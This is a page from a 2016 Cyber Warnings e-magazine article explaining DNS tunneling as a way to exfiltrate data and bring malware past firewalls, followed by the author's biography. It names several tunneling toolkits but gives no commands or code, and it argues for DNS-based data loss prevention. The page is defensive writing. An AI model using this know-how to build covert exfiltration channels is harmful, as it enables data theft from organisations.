Page 47 - Cyber Warnings
P. 47
DNS tunneling is the tunneling of IP protocol traffic through Port 53—which is often not even
inspected by firewalls, even next-generation firewalls—most likely for purposes of data
exfiltration. Malicious insiders either establish a DNS tunnel from within the network, then
encrypt and embed chunks of data in DNS queries. Data is decrypted at the other end and put
back together to get the valuable information.
All sorts of things can be tunneled (SSH or HTTP) over DNS, encrypted, and compressed—
much to the dismay of network administrators and security staff. DNS tunneling has been
around for a long time. There are several popular tunneling toolkits such as Iodine, which is
often considered the gold standard; OzymanDNS; SplitBrain; DNS2TCP; TCP-over-DNS; and
others.
There are also newer contenders that allow for tunneling at a much faster pace and offer lots of
features. Even some commercial services have popped up offering VPN service over DNS, thus
allowing you to bypass many Wi-Fi security controls. Most of these tools have specific
signatures that can be used for detection and mitigation.
DNS is not only used for data leakage, but also to move malicious code into a network. This
infiltration is easier than you think. Hackers can prepare a binary, encode it, and transport it past
firewalls and content filters via DNS into an organization’s network. Hackers send and receive
data via DNS—effectively converting it into a covert transport protocol.
Don’t Become the Next Data Breach Victim
DNS is the perfect enforcement point to improve your organization’s security posture. It is close
to endpoints, ubiquitous, and in the path of DNS-based exfiltration. While DLP technology
solutions protect against data leakage via email, web, FTP, and other vectors, most don’t have
visibility into DNS-based exfiltration. To maximize your chances of fighting back against these
data theft attempts, complement traditional data loss prevention protection with a DNS- based
solution.
About the Author
Mr. Sleiman has more than 20 years of sales, technical and business
experience with some of the world’s leading networking and
telecommunications technology companies. He has held key executive
roles, including chief operating officer and chief technology officer at Core
Communications, a software and IT services company focused on cloud-
based business services and web and mobile apps. He spent more than six
years at Cisco in various leadership positions, the last being senior director,
leading the enterprise business for Middle East and Africa. He also
developed the strategic vision and technology roadmap, and managed all
aspects of research and development, for Nortel Networks in his role as CTO, Enterprise
Business Unit.
47 Cyber Warnings E-Magazine – March 2016 Edition
Copyright © Cyber Defense Magazine, All rights reserved worldwide
